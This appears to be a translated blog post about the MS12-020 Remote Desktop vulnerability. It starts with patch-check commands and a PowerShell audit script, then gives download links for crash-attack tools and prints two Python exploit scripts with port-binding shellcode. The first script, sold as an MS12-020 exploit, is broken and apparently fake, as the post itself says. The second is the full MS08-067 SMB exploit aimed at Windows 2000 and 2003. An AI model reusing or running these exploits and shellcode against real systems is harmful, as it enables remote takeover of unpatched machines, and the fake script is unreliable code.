On the MS12-020 (port 3389) "0day exp" for the Remote Desktop remote code execution vulnerability

Luigi Auriemma, working with TippingPoint's Zero Day Initiative, reported the Remote Desktop Protocol vulnerability (CVE-2012-0002).

How do I check whether the update is already installed?

The update for this vulnerability is KB2621440. You can check it yourself under Control Panel --> Add or Remove Programs (remember to tick "Show updates"), then look for that number; if it is listed, the update is installed and you need not worry. Alternatively, run the command: systeminfo

Look for the number in the list of installed updates it prints, or simply search for it from the command line, for example: systeminfo | find /i "KB2621440"

We strongly recommend turning on Automatic Updates and setting it to download and install updates automatically.
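As an added example (not from the original post), the same check in PowerShell, extended to the two host-side settings that decide how exposed an unpatched machine is: whether Remote Desktop is enabled at all, whether Network Level Authentication is required, and what is currently listening on 3389. The KB number is the one given above; the cmdlets and registry keys are standard Windows ones.

```powershell
# Added example: audit a Windows host for the MS12-020 fix (KB2621440) and its RDP exposure.
# The KB number comes from the post above; the registry paths are the standard Terminal Server keys.
$Kb = 'KB2621440'

# 1. Is the update installed? Get-HotFix reads the same hotfix list that systeminfo prints.
$fix = Get-HotFix -Id $Kb -ErrorAction SilentlyContinue
if ($fix) {
    "[+] $Kb is installed (installed on $($fix.InstalledOn))"
} else {
    "[!] $Kb NOT found: this host is unpatched for MS12-020 (CVE-2012-0002)"
}

# 2. Is Remote Desktop enabled at all? fDenyTSConnections = 1 means RDP is switched off.
$ts = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
if ($ts.fDenyTSConnections -eq 1) {
    "[+] Remote Desktop is disabled (fDenyTSConnections=1); 3389 should not be reachable"
} else {
    "[!] Remote Desktop is enabled; make sure the patch is present and restrict 3389 at the firewall"
}

# 3. Is Network Level Authentication required? With NLA the client must authenticate before a
#    full RDP session is set up, which limits what an unauthenticated client can reach.
$rdpTcp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
if ($rdpTcp.UserAuthentication -eq 1) { "[+] NLA is required" } else { "[!] NLA is not required" }

# 4. What is listening on 3389 right now? netstat is available on every Windows version the post covers.
$listeners = netstat -ano | Select-String ':3389\s+\S+\s+LISTENING'
if ($listeners) { "[i] Listeners on 3389:"; $listeners } else { "[+] Nothing is listening on 3389" }
```

Run it in an elevated PowerShell prompt; a "[!]" on line 1 combined with a "[!]" on line 2 is the combination that needs attention first.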


MS12-020 3389 0day exp: Remote Desktop remote code execution vulnerability



ms12-020 <-- EXE version of the blue-screen (crash) attack; command format: IP + port

EXP 1: http://www.sitedirsec.com/exp/ms12-020.rar

MS12-020_py <-- Python version of the blue-screen attack; command format: IP; the port has to be changed in the code yourself

EXP 2: http://www.sitedirsec.com/exp/MS12-020_py.rar

MS12-020_ruby <-- Ruby version of the blue-screen attack; untested, no environment available

EXP 3: http://www.sitedirsec.com/exp/MS12-020_ruby.rar

 

People say the Python code circulating online for the MS12-020 Remote Desktop (RDP) remote code execution vulnerability is fake and is actually old code. In fact, that Python code is extremely similar to the 2008 one, as shown below:

MS12-020 Exp, MS12-020.exe, MS12-020 exploit program

Requires FreeRDP to be installed

This appears to be the ms12-020 exp everyone has been searching for

Download: http://115.com/file/anmgwyzh

Video: http://good.gd/1975261.htm

FreeRDP module: https://github.com/FreeRDP/FreeRDP/downloads

This is the Python version of the ms12-020 exp code circulating online:

#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploit
#   Uses FreeRDP
#############################################################################
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

#bind shellcode TCP port 4444
shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'

#Payload
payload  = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';

class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target

        # Making the packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'

if __name__ == '__main__':
    target = sys.argv[1]
    print '\nUsage: %s <target ip> \n' % sys.argv[0]
    sys.exit(-1)

current = SRVSVC_Exploit(target)
current.start()

This is the Python code for the 2008 vulnerability; at a glance the two are extremely similar. MS Windows Server Service Code Execution Exploit (MS08-067):

====================================================================
MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3)
====================================================================
#!/usr/bin/env python
#############################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread    #Thread is imported incase you would like to modify
                                #the src to run against multiple targets.
try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc import transport
except ImportError, _:
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)

print '#######################################################################'
print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '#   www.hackingspirits.com'
print '#   www.coffeeandsecurity.com'
print '#   Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'

#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"

#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'

#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'

if sys.argv[2]=='1':    #Windows 2000 Payload
    payload=payload_1
    print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2':    #Windows 2003[SP2] Payload
    payload=payload_2
    print '[-]Windows 2003[SP2] payload loaded'

class SRVSVC_Exploit(Thread):
    def __init__(self, target, osver, port=445):
        super(SRVSVC_Exploit, self).__init__()
        self.__port   = port
        self.target   = target
        self.osver   = osver

    def __DCEPacket(self):
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

        # Constructing Malicious Packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
        print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'

if __name__ == '__main__':
    try:
        target = sys.argv[1]
        osver = sys.argv[2]
    except IndexError:
        print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
        print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
        print 'Select OS Version'
        print '[-]Windows 2000: OS Version = 1'
        print '[-]Windows 2003[SP2]: OS Version = 2'
        sys.exit(-1)

current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'

# 1337day.com [2008-11-16]
